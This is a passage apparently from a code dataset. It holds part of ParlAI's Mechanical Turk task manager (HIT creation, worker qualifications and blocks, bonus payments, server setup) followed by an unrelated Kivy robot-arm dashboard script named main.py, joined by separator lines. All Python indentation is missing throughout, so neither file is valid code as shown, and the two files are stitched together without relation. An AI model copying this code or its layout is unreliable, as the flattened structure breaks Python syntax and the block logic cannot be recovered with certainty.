agent = self.worker_manager.get_agent_for_assignment(assignment_id)
# Only start an onboarding world if the worker never got a world
if agent.get_status() != AssignState.STATUS_NONE:
return False
# Start the onboarding thread and run it
onboard_thread = threading.Thread(
target=_onboard_function,
args=(mturk_agent,),
name='onboard-{}-{}'.format(worker_id, assignment_id)
)
onboard_thread.daemon = True
onboard_thread.start()
self.assignment_to_onboard_thread[assignment_id] = onboard_thread
return True
def _no_agents_incomplete(self, agents):
"""Return True if all the given agents completed their task"""
for agent in agents:
if not agent.is_final() or agent.get_status() != \
AssignState.STATUS_DONE:
return False
return True
def _check_time_limit(self):
if time.time() - self.time_limit_checked < RESET_TIME_LOG_TIMEOUT:
return
if int(time.time()) % (60 * 60 * 24) > (60 * 30):
# sync the time resets to ONCE DAILY in a 30 minute window
return
self.time_limit_checked = time.time()
self._reset_time_logs()
self.worker_manager.un_time_block_workers()
def is_onboarding_world(self, conversation_id):
return conversation_id is not None and conversation_id.startswith('o_')
def is_waiting_world(self, conversation_id):
return conversation_id is not None and conversation_id.startswith('w_')
def is_task_world(self, conversation_id):
return conversation_id is not None and conversation_id.startswith('t_')
# Manager Lifecycle Functions #
def setup_server(self, task_directory_path=None):
"""Prepare the MTurk server for the new HIT we would like to submit"""
assert self.task_state >= self.STATE_CREATED
fin_word = 'start'
if self.opt['count_complete']:
fin_word = 'finish'
shared_utils.print_and_log(
logging.INFO,
'\nYou are going to allow workers from Amazon Mechanical Turk to '
'be an agent in ParlAI.\nDuring this process, Internet connection '
'is required, and you should turn off your computer\'s auto-sleep '
'feature.',
should_print=True,
)
if self.opt['max_connections'] == 0:
shared_utils.print_and_log(
logging.INFO,
'Enough HITs will be created to fulfill {} times the '
'number of conversations requested, extra HITs will be expired'
' once the desired conversations {}.'
''.format(HIT_MULT, fin_word),
should_print=True,
)
else:
shared_utils.print_and_log(
logging.INFO,
'Enough HITs will be launched over time '
'up to a max of {} times the amount requested until the '
'desired number of conversations {}.'
''.format(HIT_MULT, fin_word),
should_print=True,
)
input('Please press Enter to continue... ')
shared_utils.print_and_log(logging.NOTSET, '', True)
if self.opt['local'] is True:
shared_utils.print_and_log(
logging.INFO,
"In order to run the server locally, you will need "
"to have a public HTTPS endpoint (SSL signed) running on "
"the server you are currently excecuting ParlAI on. Enter "
"that public URL hostname when prompted and ensure that the "
"port being used by ParlAI (usually 3000) has external "
"traffic routed to it.",
should_print=True,
)
input('Please press Enter to continue... ')
mturk_utils.setup_aws_credentials()
# See if there's enough money in the account to fund the HITs requested
num_assignments = self.required_hits
payment_opt = {
'type': 'reward',
'num_total_assignments': num_assignments,
'reward': self.opt['reward'], # in dollars
}
total_cost = mturk_utils.calculate_mturk_cost(payment_opt=payment_opt)
if not mturk_utils.check_mturk_balance(
balance_needed=total_cost,
is_sandbox=self.opt['is_sandbox']):
raise SystemExit('Insufficient funds')
if ((not self.opt['is_sandbox']) and
(total_cost > 100 or self.opt['reward'] > 1)):
confirm_string = '$%.2f' % total_cost
expected_cost = total_cost / HIT_MULT
expected_string = '$%.2f' % expected_cost
shared_utils.print_and_log(
logging.INFO,
'You are going to create {} HITs at {} per assignment, for a '
'total cost up to {} after MTurk fees. Please enter "{}" to '
'confirm and continue, and anything else to cancel.\nNote that'
' of the {}, the target amount to spend is {}.'.format(
self.required_hits,
'$%.2f' % self.opt['reward'],
confirm_string,
confirm_string,
confirm_string,
expected_string
),
should_print=True
)
check = input('Enter here: ')
if (check != confirm_string and ('$' + check) != confirm_string):
raise SystemExit('Cancelling')
# Check to see if there are any additional notices on the parlai site
if not self.is_test:
shared_utils.print_and_log(
logging.INFO,
'Querying the parlai website for possible notices...',
should_print=True)
endpoint = 'sandbox' if self.is_sandbox else 'live'
resp = requests.post(PARLAI_MTURK_NOTICE_URL + endpoint)
warnings = resp.json()
for warn in warnings:
print('Notice: ' + warn)
accept = input('Continue? (Y/n): ')
if accept == 'n':
raise SystemExit('Additional notice was rejected.')
self.logging_permitted = self._logging_permission_check()
shared_utils.print_and_log(logging.INFO, 'Setting up MTurk server...',
should_print=True)
self.is_unique = self.opt['unique_worker'] or \
(self.opt['unique_qual_name'] is not None)
self.max_hits_per_worker = self.opt.get('max_hits_per_worker', 0)
mturk_utils.create_hit_config(
task_description=self.opt['task_description'],
unique_worker=self.is_unique,
is_sandbox=self.opt['is_sandbox']
)
# Poplulate files to copy over to the server
if not self.task_files_to_copy:
self.task_files_to_copy = []
if not task_directory_path:
task_directory_path = os.path.join(
self.opt['parlai_home'],
'parlai',
'mturk',
'tasks',
self.opt['task']
)
self.task_files_to_copy.append(
os.path.join(task_directory_path, 'html', 'cover_page.html'))
try:
for file_name in os.listdir(os.path.join(
task_directory_path, 'html')):
self.task_files_to_copy.append(os.path.join(
task_directory_path, 'html', file_name
))
except FileNotFoundError: # noqa F821 we don't support python2
# No html dir exists
pass
for mturk_agent_id in self.mturk_agent_ids + ['onboarding']:
self.task_files_to_copy.append(os.path.join(
task_directory_path,
'html',
'{}_index.html'.format(mturk_agent_id)
))
# Setup the server with a likely-unique app-name
task_name = '{}-{}'.format(str(uuid.uuid4())[:8], self.opt['task'])
self.server_task_name = \
''.join(e for e in task_name.lower() if e.isalnum() or e == '-')
if 'heroku_team' in self.opt:
heroku_team = self.opt['heroku_team']
else:
heroku_team = None
self.server_url = server_utils.setup_server(self.server_task_name,
self.task_files_to_copy,
self.opt['local'],
heroku_team)
shared_utils.print_and_log(logging.INFO, self.server_url)
shared_utils.print_and_log(logging.INFO, "MTurk server setup done.\n",
should_print=True)
self.task_state = self.STATE_SERVER_ALIVE
def start_new_run(self):
"""Clear state to prepare for a new run"""
assert self.task_state >= self.STATE_SERVER_ALIVE, \
'Cannot start a run before having a running server using ' \
'`mturk_manager.setup_server()` first.'
self.run_id = str(int(time.time()))
self.task_group_id = '{}_{}'.format(self.opt['task'], self.run_id)
self._init_state()
try:
self.topic_arn = mturk_utils.setup_sns_topic(
self.opt['task'],
self.server_url,
self.task_group_id
)
except Exception:
self.topic_arn = None
shared_utils.print_and_log(
logging.WARN,
'Botocore couldn\'t subscribe to HIT events, '
'perhaps you tried to register to localhost?',
should_print=True
)
if self.db_logger is not None:
self.db_logger.log_new_run(self.required_hits)
self.task_state = self.STATE_INIT_RUN
def ready_to_accept_workers(self, timeout_seconds=None):
"""Set up socket to start communicating to workers"""
assert self.task_state >= self.STATE_INIT_RUN, \
'Cannot be ready to accept workers before starting a run with ' \
'`mturk_manager.start_new_run()` first.'
shared_utils.print_and_log(logging.INFO,
'Local: Setting up WebSocket...',
not self.is_test)
self._setup_socket(timeout_seconds=timeout_seconds)
shared_utils.print_and_log(logging.INFO, 'WebSocket set up!',
should_print=True)
# Just in case create_hits was called first. To be removed when that
# workflow is no longer supported
if self.STATE_ACCEPTING_WORKERS > self.task_state:
self.task_state = self.STATE_ACCEPTING_WORKERS
def set_onboard_function(self, onboard_function):
self.onboard_function = onboard_function
def start_task(self, eligibility_function, assign_role_function,
task_function):
"""Handle running a task by checking to see when enough agents are
in the pool to start an instance of the task. Continue doing this
until the desired number of conversations is had.
"""
assert self.task_state >= self.STATE_HITS_MADE, \
'Must have launched HITs with `mturk_manager.create_hits`' \
' to start the task'
if callable(eligibility_function):
# Convert legacy eligibility_functions to the new format
eligibility_function = {
'multiple': False,
'func': eligibility_function,
}
else:
# Ensure the eligibility function is valid
if 'func' not in eligibility_function:
shared_utils.print_and_log(
logging.CRITICAL,
"eligibility_function has no 'func'. Cancelling."
)
raise Exception(
'eligibility_function dict must contain a `func` field '
'containing the actual function.'
)
elif not callable(eligibility_function['func']):
shared_utils.print_and_log(
logging.CRITICAL,
"eligibility_function['func'] not a function. Cancelling."
)
raise Exception(
"eligibility_function['func'] must contain a function. "
"If eligibility_function['multiple'] is set, it should "
"filter through the list of workers and only return those "
"that are currently eligible to participate. If it is not "
"set, it should take in a single worker and return whether"
" or not they are eligible."
)
if 'multiple' not in eligibility_function:
eligibility_function['multiple'] = False
def _task_function(opt, agents, conversation_id):
"""Wait for agents to join the world, then run task function"""
shared_utils.print_and_log(
logging.INFO,
'Starting task {}...'.format(conversation_id)
)
shared_utils.print_and_log(
logging.DEBUG,
'Waiting for all agents to join the conversation...'
)
start_time = time.time()
while True:
all_joined = True
for agent in agents:
# check the status of an individual agent assignment
if agent.get_status() != AssignState.STATUS_IN_TASK:
all_joined = False
if all_joined:
break
if time.time() - start_time > WORLD_START_TIMEOUT:
# We waited but not all agents rejoined, throw agents
# back into the waiting pool. Stragglers will disconnect
# from there
shared_utils.print_and_log(
logging.INFO,
'Timeout waiting for {}, move back to waiting'.format(
conversation_id
)
)
self._move_agents_to_waiting(agents)
return
time.sleep(shared_utils.THREAD_SHORT_SLEEP)
shared_utils.print_and_log(
logging.INFO,
'All agents joined the conversation {}!'.format(
conversation_id
)
)
self.started_conversations += 1
task_function(mturk_manager=self, opt=opt, workers=agents)
# Delete extra state data that is now unneeded
for agent in agents:
agent.clear_messages()
# Count if it's a completed conversation
if self._no_agents_incomplete(agents):
self.completed_conversations += 1
if self.opt['max_connections'] > 0: # If using a conv cap
if self.accepting_workers: # if still looking for new agents
for agent in agents:
if agent.submitted_hit():
self.create_additional_hits(1)
while not self.is_shutdown:
if self.has_time_limit:
self._check_time_limit()
if self.db_logger is not None:
self._maintain_hit_status()
# Loop forever starting task worlds until desired convos are had
with self.agent_pool_change_condition:
valid_agents = self._get_unique_pool(eligibility_function)
needed_agents = len(self.mturk_agent_ids)
if len(valid_agents) >= needed_agents:
# enough agents in pool to start new conversation
self.conversation_index += 1
new_conversation_id = \
't_{}'.format(self.conversation_index)
# Add the required number of valid agents to the conv
agents = [a for a in valid_agents[:needed_agents]]
assign_role_function(agents)
# Allow task creator to filter out agents and run
# versions of the task that require fewer agents
agents = [a for a in agents if a.id is not None]
for agent in agents:
self.worker_manager.change_agent_conversation(
agent=agent,
conversation_id=new_conversation_id,
new_agent_id=agent.id,
)
# Remove selected agents from the pool
self._remove_from_agent_pool(agent)
# Start a new thread for this task world
task_thread = threading.Thread(
target=_task_function,
args=(self.opt, agents, new_conversation_id),
name='task-{}'.format(new_conversation_id)
)
task_thread.daemon = True
task_thread.start()
self.task_threads.append(task_thread)
# Once we've had enough conversations, finish and break
compare_count = self.started_conversations
if (self.opt['count_complete']):
compare_count = self.completed_conversations
if compare_count >= self.num_conversations:
self.accepting_workers = False
self.expire_all_unassigned_hits()
self._expire_onboarding_pool()
self._expire_agent_pool()
# Wait for all conversations to finish, then break from
# the while loop
for thread in self.task_threads:
thread.join()
break
time.sleep(shared_utils.THREAD_MEDIUM_SLEEP)
def _wait_for_task_expirations(self):
"""Wait for the full task duration to ensure anyone who sees the task
has it expired, and ensures that all tasks are properly expired
"""
start_time = time.time()
min_wait = self.opt['assignment_duration_in_seconds']
while time.time() - start_time < min_wait and \
len(self.hit_id_list) > 0:
self.expire_all_unassigned_hits()
time.sleep(
max(self.opt['assignment_duration_in_seconds'] / 60, 0.1)
)
def shutdown(self, force=False):
"""Handle any mturk client shutdown cleanup."""
# Ensure all threads are cleaned and state and HITs are handled
if self.is_shutdown and not force:
return
self.is_shutdown = True
try:
self.expire_all_unassigned_hits()
self._expire_onboarding_pool()
self._expire_agent_pool()
self._wait_for_task_expirations()
for assignment_id in self.assignment_to_onboard_thread:
self.assignment_to_onboard_thread[assignment_id].join()
except BaseException:
pass
finally:
if self.server_task_name is not None:
server_utils.delete_server(self.server_task_name,
self.opt['local'])
if self.topic_arn is not None:
mturk_utils.delete_sns_topic(self.topic_arn)
if self.opt['unique_worker'] and not self.opt['unique_qual_name']:
mturk_utils.delete_qualification(self.unique_qual_id,
self.is_sandbox)
if self.socket_manager is not None:
self.socket_manager.shutdown()
if self.logging_permitted and not self.is_sandbox and \
not self.is_test:
self._upload_worker_data()
if self.worker_manager is not None:
self.worker_manager.shutdown()
# MTurk Agent Interaction Functions #
def force_expire_hit(self, worker_id, assign_id, text=None, ack_func=None):
"""Send a command to expire a hit to the provided agent, update State
to reflect that the HIT is now expired
"""
# Expire in the state
agent = self.worker_manager._get_agent(worker_id, assign_id)
if agent is not None:
if agent.is_final():
return
agent.set_status(AssignState.STATUS_EXPIRED)
agent.hit_is_expired = True
if ack_func is None:
def use_ack_func(*args):
self.socket_manager.close_channel(
'{}_{}'.format(worker_id, assign_id))
else:
def use_ack_func(*args):
ack_func(*args)
self.socket_manager.close_channel(
'{}_{}'.format(worker_id, assign_id))
# Send the expiration command
if text is None:
text = ('This HIT is expired, please return and take a new '
'one if you\'d want to work on this task.')
data = {'text': data_model.COMMAND_EXPIRE_HIT, 'inactive_text': text}
self.send_command(worker_id, assign_id, data, ack_func=use_ack_func)
def handle_turker_timeout(self, worker_id, assign_id):
"""To be used by the MTurk agent when the worker doesn't send a message
within the expected window.
"""
# Expire the hit for the disconnected user
text = ('You haven\'t entered a message in too long. As these HITs '
' often require real-time interaction, this hit has '
'been expired and you have been considered disconnected. '
'Disconnect too frequently and you will be blocked from '
'working on these HITs in the future.')
self.force_expire_hit(worker_id, assign_id, text)
# Send the disconnect event to all workers in the convo
self._handle_agent_disconnect(worker_id, assign_id)
def send_message(self, receiver_id, assignment_id, data,
blocking=True, ack_func=None):
"""Send a message through the socket manager,
update conversation state
"""
data = data.copy() # Ensure data packet is sent in current state
data['type'] = data_model.MESSAGE_TYPE_MESSAGE
# Force messages to have a unique ID
if 'message_id' not in data:
data['message_id'] = str(uuid.uuid4())
conversation_id = None
agent = self.worker_manager._get_agent(receiver_id, assignment_id)
if agent is not None:
conversation_id = agent.conversation_id
event_id = shared_utils.generate_event_id(receiver_id)
packet = Packet(
event_id,
Packet.TYPE_MESSAGE,
self.socket_manager.get_my_sender_id(),
receiver_id,
assignment_id,
data,
conversation_id=conversation_id,
blocking=blocking,
ack_func=ack_func
)
shared_utils.print_and_log(
logging.INFO,
'Manager sending: {}'.format(packet),
should_print=self.opt['verbose']
)
# Push outgoing message to the message thread to be able to resend
# on a reconnect event
if agent is not None:
agent.append_message(packet.data)
self.socket_manager.queue_packet(packet)
return data['message_id']
def send_command(self, receiver_id, assignment_id, data, blocking=True,
ack_func=None):
"""Sends a command through the socket manager,
update conversation state
"""
data['type'] = data_model.MESSAGE_TYPE_COMMAND
event_id = shared_utils.generate_event_id(receiver_id)
packet = Packet(
event_id,
Packet.TYPE_MESSAGE,
self.socket_manager.get_my_sender_id(),
receiver_id,
assignment_id,
data,
blocking=blocking,
ack_func=ack_func
)
agent = self.worker_manager._get_agent(receiver_id, assignment_id)
if (data['text'] != data_model.COMMAND_CHANGE_CONVERSATION and
data['text'] != data_model.COMMAND_RESTORE_STATE and
agent is not None):
# Append last command, as it might be necessary to restore state
agent.set_last_command(packet.data)
self.socket_manager.queue_packet(packet)
def mark_workers_done(self, workers):
"""Mark a group of agents as done to keep state consistent"""
for agent in workers:
if self.is_unique:
assert self.unique_qual_name is not None, \
'Unique qual name must not be none to use is_unique'
self.give_worker_qualification(
agent.worker_id,
self.unique_qual_name,
)
if not agent.is_final():
agent.set_status(AssignState.STATUS_DONE)
if self.max_hits_per_worker > 0:
worker_state = self.worker_manager._get_worker(agent.worker_id)
completed_assignments = worker_state.completed_assignments()
assert self.unique_qual_name is not None, 'Unique qual name ' \
'must not be none to use max_hits_per_worker'
if completed_assignments >= self.max_hits_per_worker:
self.give_worker_qualification(
agent.worker_id,
self.unique_qual_name,
)
if self.has_time_limit:
self._log_working_time(agent)
def free_workers(self, workers):
"""End completed worker threads"""
for agent in workers:
self.socket_manager.close_channel(agent.get_connection_id())
# Amazon MTurk Server Functions #
def get_agent_work_status(self, assignment_id):
return self.worker_manager.get_agent_work_status(assignment_id)
def get_qualification_list(self, qualifications=None):
if self.qualifications is not None:
return self.qualifications.copy()
if qualifications is None:
qualifications = []
if not self.is_sandbox and not self.is_test:
try:
import parlai_internal.mturk.configs as local_configs
qualifications = \
local_configs.set_default_qualifications(qualifications)
except Exception:
# not all users will be drawing configs from internal settings
pass
if self.opt['disconnect_qualification'] is not None:
block_qual_id = mturk_utils.find_or_create_qualification(
self.opt['disconnect_qualification'],
'A soft ban from using a ParlAI-created HIT due to frequent '
'disconnects from conversations, leading to negative '
'experiences for other Turkers and for the requester.',
self.is_sandbox,
)
assert block_qual_id is not None, (
'Hits could not be created as disconnect qualification could '
'not be acquired. Shutting down server.'
)
qualifications.append({
'QualificationTypeId': block_qual_id,
'Comparator': 'DoesNotExist',
'ActionsGuarded': 'DiscoverPreviewAndAccept'
})
# Add the soft block qualification if it has been specified
if self.opt['block_qualification'] is not None:
block_qual_id = mturk_utils.find_or_create_qualification(
self.opt['block_qualification'],
'A soft ban from this ParlAI-created HIT at the requesters '
'discretion. Generally used to restrict how frequently a '
'particular worker can work on a particular task.',
self.is_sandbox,
)
assert block_qual_id is not None, (
'Hits could not be created as block qualification could not be'
' acquired. Shutting down server.'
)
qualifications.append({
'QualificationTypeId': block_qual_id,
'Comparator': 'DoesNotExist',
'ActionsGuarded': 'DiscoverPreviewAndAccept'
})
if self.has_time_limit:
block_qual_name = '{}-max-daily-time'.format(self.task_group_id)
if self.opt['max_time_qual'] is not None:
block_qual_name = self.opt['max_time_qual']
self.max_time_qual = block_qual_name
block_qual_id = mturk_utils.find_or_create_qualification(
block_qual_name,
'A soft ban from working on this HIT or HITs by this '
'requester based on a maximum amount of daily work time set '
'by the requester.',
self.is_sandbox,
)
assert block_qual_id is not None, (
'Hits could not be created as a time block qualification could'
' not be acquired. Shutting down server.'
)
qualifications.append({
'QualificationTypeId': block_qual_id,
'Comparator': 'DoesNotExist',
'ActionsGuarded': 'DiscoverPreviewAndAccept'
})
if self.is_unique or self.max_hits_per_worker > 0:
self.unique_qual_name = self.opt.get('unique_qual_name')
if self.unique_qual_name is None:
self.unique_qual_name = self.task_group_id + '_max_submissions'
self.unique_qual_id = mturk_utils.find_or_create_qualification(
self.unique_qual_name,
'Prevents workers from completing a task too frequently',
self.is_sandbox,
)
qualifications.append({
'QualificationTypeId': self.unique_qual_id,
'Comparator': 'DoesNotExist',
'ActionsGuarded': 'DiscoverPreviewAndAccept'
})
self.qualifications = qualifications
return qualifications.copy()
def create_additional_hits(self, num_hits, qualifications=None):
"""Handle creation for a specific number of hits/assignments
Put created HIT ids into the hit_id_list
"""
shared_utils.print_and_log(logging.INFO,
'Creating {} hits...'.format(num_hits))
qualifications = self.get_qualification_list(qualifications)
self.opt['assignment_duration_in_seconds'] = self.opt.get(
'assignment_duration_in_seconds', 30 * 60)
hit_type_id = mturk_utils.create_hit_type(
hit_title=self.opt['hit_title'],
hit_description='{} (ID: {})'.format(self.opt['hit_description'],
self.task_group_id),
hit_keywords=self.opt['hit_keywords'],
hit_reward=self.opt['reward'],
# Set to 30 minutes by default
assignment_duration_in_seconds=self.opt.get(
'assignment_duration_in_seconds', 30 * 60),
is_sandbox=self.opt['is_sandbox'],
qualifications=qualifications,
auto_approve_delay=self.auto_approve_delay,
)
mturk_chat_url = '{}/chat_index?task_group_id={}'.format(
self.server_url,
self.task_group_id
)
shared_utils.print_and_log(logging.INFO, mturk_chat_url)
mturk_page_url = None
if self.topic_arn is not None:
mturk_utils.subscribe_to_hits(
hit_type_id,
self.is_sandbox,
self.topic_arn
)
for _i in range(num_hits):
mturk_page_url, hit_id, mturk_response = \
mturk_utils.create_hit_with_hit_type(
page_url=mturk_chat_url,
hit_type_id=hit_type_id,
num_assignments=1,
is_sandbox=self.is_sandbox
)
if self.db_logger is not None:
self.db_logger.log_hit_status(mturk_response)
self.hit_id_list.append(hit_id)
return mturk_page_url
def create_hits(self, qualifications=None):
"""Create hits based on the managers current config, return hit url"""
shared_utils.print_and_log(logging.INFO, 'Creating HITs...', True)
if self.task_state < self.STATE_ACCEPTING_WORKERS:
shared_utils.print_and_log(
logging.WARN,
'You should be calling `ready_to_accept_workers` before '
'`create_hits` to ensure that the socket is connected before'
'hits are added. This will be enforced in future versions.',
True
)
if self.opt['max_connections'] == 0:
mturk_page_url = self.create_additional_hits(
num_hits=self.required_hits,
qualifications=qualifications,
)
else:
mturk_page_url = self.create_additional_hits(
num_hits=min(self.required_hits, self.opt['max_connections']),
qualifications=qualifications,
)
shared_utils.print_and_log(logging.INFO,
'Link to HIT: {}\n'.format(mturk_page_url),
should_print=True)
shared_utils.print_and_log(
logging.INFO,
'Waiting for Turkers to respond... (Please don\'t close'
' your laptop or put your computer into sleep or standby mode.)\n',
should_print=True
)
self.task_state = self.STATE_HITS_MADE
return mturk_page_url
def get_hit(self, hit_id):
"""Get hit from mturk by hit_id"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
hit = client.get_hit(HITId=hit_id)
if self.db_logger is not None:
try:
self.db_logger.log_hit_status(hit)
except Exception:
pass
return hit
def get_assignment(self, assignment_id):
"""Gets assignment from mturk by assignment_id. Only works if the
assignment is in a completed state
"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
return client.get_assignment(AssignmentId=assignment_id)
def get_assignments_for_hit(self, hit_id):
"""Get completed assignments for a hit"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
assignments_info = client.list_assignments_for_hit(HITId=hit_id)
return assignments_info.get('Assignments', [])
def expire_all_unassigned_hits(self):
"""Move through the whole hit_id list and attempt to expire the
HITs, though this only immediately expires those that aren't assigned.
"""
# TODO note and mark assigned hits as ones to be expired later
shared_utils.print_and_log(logging.INFO,
'Expiring all unassigned HITs...',
should_print=not self.is_test)
completed_ids = self.worker_manager.get_complete_hits()
for hit_id in self.hit_id_list:
if hit_id not in completed_ids:
# TODO get confirmation that the HIT is acutally expired
mturk_utils.expire_hit(self.is_sandbox, hit_id)
def approve_work(self, assignment_id):
"""approve work for a given assignment through the mturk client"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
client.approve_assignment(AssignmentId=assignment_id)
if self.db_logger is not None:
self.db_logger.log_approve_assignment(assignment_id)
shared_utils.print_and_log(
logging.INFO,
'Assignment {} approved.'
''.format(assignment_id),
)
def reject_work(self, assignment_id, reason):
"""reject work for a given assignment through the mturk client"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
client.reject_assignment(
AssignmentId=assignment_id,
RequesterFeedback=reason
)
if self.db_logger is not None:
self.db_logger.log_reject_assignment(assignment_id)
shared_utils.print_and_log(
logging.INFO,
'Assignment {} rejected for reason {}.'
''.format(assignment_id, reason),
)
def approve_assignments_for_hit(self, hit_id, override_rejection=False):
"""Approve work for assignments associated with a given hit, through
mturk client
"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
assignments = self.get_assignments_for_hit(hit_id)
for assignment in assignments:
assignment_id = assignment['AssignmentId']
client.approve_assignment(AssignmentId=assignment_id,
OverrideRejection=override_rejection)
def block_worker(self, worker_id, reason):
"""Block a worker by id using the mturk client, passes reason along"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
client.create_worker_block(WorkerId=worker_id, Reason=reason)
shared_utils.print_and_log(
logging.INFO,
'Worker {} blocked for reason {}.'
''.format(worker_id, reason),
)
def soft_block_worker(self, worker_id, qual='block_qualification'):
"""Soft block a worker by giving the worker the block qualification"""
qual_name = self.opt.get(qual, None)
assert qual_name is not None, ('No qualification {} has been specified'
'in opt'.format(qual))
self.give_worker_qualification(worker_id, qual_name)
def un_soft_block_worker(self, worker_id, qual='block_qualification'):
"""Remove a soft block from a worker by removing a block qualification
from the worker"""
qual_name = self.opt.get(qual, None)
assert qual_name is not None, ('No qualification {} has been specified'
'in opt'.format(qual))
self.remove_worker_qualification(worker_id, qual_name)
def give_worker_qualification(self, worker_id, qual_name, qual_value=None):
"""Give a worker a particular qualification"""
qual_id = mturk_utils.find_qualification(qual_name, self.is_sandbox)
if qual_id is False or qual_id is None:
shared_utils.print_and_log(
logging.WARN,
'Could not give worker {} qualification {}, as the '
'qualification could not be found to exist.'
''.format(worker_id, qual_name),
should_print=True
)
return
mturk_utils.give_worker_qualification(worker_id, qual_id, qual_value,
self.is_sandbox)
shared_utils.print_and_log(
logging.INFO,
'gave {} qualification {}'.format(worker_id, qual_name),
should_print=True
)
def remove_worker_qualification(self, worker_id, qual_name, reason=''):
"""Remove a qualification from a worker"""
qual_id = mturk_utils.find_qualification(qual_name, self.is_sandbox)
if qual_id is False or qual_id is None:
shared_utils.print_and_log(
logging.WARN,
'Could not remove from worker {} qualification {}, as the '
'qualification could not be found to exist.'
''.format(worker_id, qual_name),
should_print=True
)
return
try:
mturk_utils.remove_worker_qualification(worker_id, qual_id,
self.is_sandbox, reason)
shared_utils.print_and_log(
logging.INFO,
'removed {}\'s qualification {}'.format(worker_id, qual_name),
should_print=True
)
except Exception as e:
shared_utils.print_and_log(
logging.WARN if not self.has_time_limit else logging.INFO,
'removing {}\'s qualification {} failed with error {}. This '
'can be because the worker didn\'t have that qualification.'
''.format(worker_id, qual_name, repr(e)),
should_print=True
)
def create_qualification(self, qualification_name, description,
can_exist=True):
"""Create a new qualification. If can_exist is set, simply return
the ID of the existing qualification rather than throw an error
"""
if not can_exist:
qual_id = mturk_utils.find_qualification(qualification_name,
self.is_sandbox)
if qual_id is not None:
shared_utils.print_and_log(
logging.WARN,
'Could not create qualification {}, as it existed'
''.format(qualification_name),
should_print=True
)
return None
return mturk_utils.find_or_create_qualification(
qualification_name,
description,
self.is_sandbox
)
def pay_bonus(self, worker_id, bonus_amount, assignment_id, reason,
unique_request_token):
"""Handles paying bonus to a turker, fails for insufficient funds.
Returns True on success and False on failure
"""
total_cost = mturk_utils.calculate_mturk_cost(
payment_opt={'type': 'bonus', 'amount': bonus_amount}
)
if not mturk_utils.check_mturk_balance(balance_needed=total_cost,
is_sandbox=self.is_sandbox):
shared_utils.print_and_log(
logging.WARN,
'Cannot pay bonus. Reason: Insufficient '
'funds in your MTurk account.',
should_print=True
)
return False
client = mturk_utils.get_mturk_client(self.is_sandbox)
# unique_request_token may be useful for handling future network errors
client.send_bonus(
WorkerId=worker_id,
BonusAmount=str(bonus_amount),
AssignmentId=assignment_id,
Reason=reason,
UniqueRequestToken=unique_request_token
)
shared_utils.print_and_log(
logging.INFO,
'Paid ${} bonus to WorkerId: {}'.format(
bonus_amount,
worker_id
)
)
return True
def email_worker(self, worker_id, subject, message_text):
"""Send an email to a worker through the mturk client"""
client = mturk_utils.get_mturk_client(self.is_sandbox)
response = client.notify_workers(
Subject=subject,
MessageText=message_text,
WorkerIds=[worker_id]
)
if len(response['NotifyWorkersFailureStatuses']) > 0:
failure_message = response['NotifyWorkersFailureStatuses'][0]
return {'failure': failure_message['NotifyWorkersFailureMessage']}
else:
return {'success': True}
|
main.py
|
import cv2
from os import environ
environ["KIVY_CAMERA"] = 'opencv'
environ['KIVY_WINDOW'] = 'sdl2'
environ['KIVY_VIDEO'] = 'ffmpeg'
environ['KIVY_IMAGE'] = 'sdl2'
from kivy import Config
Config.set('graphics', 'width', f'{1080}')
Config.set('graphics', 'height', f'{720}')
Config.set('graphics', 'maxfps', '60')
from kivymd.app import MDApp
from kivy.graphics.texture import Texture
import kivy
from robot import Robot
from joystick import Joystick
from kivy.clock import Clock
from threading import Thread
from numpy import clip
from ctypes import *
#ik_lib = CDLL("/home/pi/Desktop/DOFBot-easy-tool/ik.so")
class Point(Structure):
_fields_ = [
('x', c_float),
('y', c_float),
('z', c_float)
]
def PytoC(arr):
seq = c_int * len(arr)
return seq(*arr)
#targets = [90, 90, 90, 90, 90, 90]
class DashboardApp(MDApp):
def __init__(self):
super(DashboardApp, self).__init__()
self.robot = Robot()
Clock.schedule_interval(self.display_axis_data, 0.1)
#Clock.schedule_interval(self.viewfinder, 0.066)
#Clock.schedule_interval(self.update_motors, 0.05)
#self.control_pad = Joystick()
#Clock.schedule_interval(self.control_pad.poll_buttons, 0.1)
self.slider_cache = []
self.robot.arm.Arm_serial_set_torque(1)
def build(self, *args, **kwargs):
super(DashboardApp, self).build(*args, **kwargs)
Thread(target=self.robot.poll_axes).start()
def viewfinder(self, *args, **kwargs):
# ret, frame = self.camera.read()
# cv2.imshow("CV2 Image", frame)
##buf1 = cv2.flip(frame, 0)
# buf = buf1.tobytes()
# self.camTex.blit_buffer(buf, colorfmt='bgr', bufferfmt='ubyte')
# self.root.ids['camera'].texture = self.camTex
pass
def control(self):
#self.control_pad.poll_buttons()
if not self.robot.disable_move:
self.root.ids['ax1'].value -= round(self.control_pad.axes[0] * 100) * 0.05
self.root.ids['ax2'].value += round(self.control_pad.axes[1] * 100) * 0.05
self.root.ids['ax5'].value += round(self.control_pad.axes[2] * 100) * 0.05
self.root.ids['ax3'].value += round(self.control_pad.axes[3] * 100) * 0.05
self.root.ids['ax4'].value += round(self.control_pad.axes[4] * 100) * 0.05
self.root.ids['ax6'].value += round(self.control_pad.axes[5] * 100) * 0.1
restrict = clip([self.root.ids[f'ax{i + 1}'].value for i in range(0, 6)], -90, 90)
def display_axis_data(self, *args, **kwargs):
angles = self.robot.axes
for i in range(0, 5):
self.root.ids[f'ax{i + 1}_readout'].text = f"Axa {i + 1}: {angles[i]}°"
def update_motors(self, *args, **kwargs):
self.control()
targets = [int(self.root.ids[f"ax{i + 1}"].value + 90) for i in range(0, 6)]
self.robot.move(targets)
#tgt = Point.from_address( ik_lib.inverse_kinematics(PytoC(targets), PytoC([1, 1, 1, 1, 1])) )
#print(f"{tgt.x} {tgt.y} {tgt.z}")
#ik_lib.free_point(byref(tgt))
def mde_lrn(self):
Thread(target=self.robot.toggle_learn).start()
def add(self):
self.robot.add_step()
self.root.ids['stepcount'].text = str(int(self.root.ids['stepcount'].text) + 1)
def rm(self):
exit_code = self.robot.remove_step()
if exit_code:
self.root.ids['stepcount'].text = str(int(self.root.ids['stepcount'].text) - 1)
def strt(self):
#print("here")
Thread(target=self.robot.execute).start()
def on_stop(self):
self.robot.alive = False
if __name__ == '__main__':
DashboardApp().run()
|
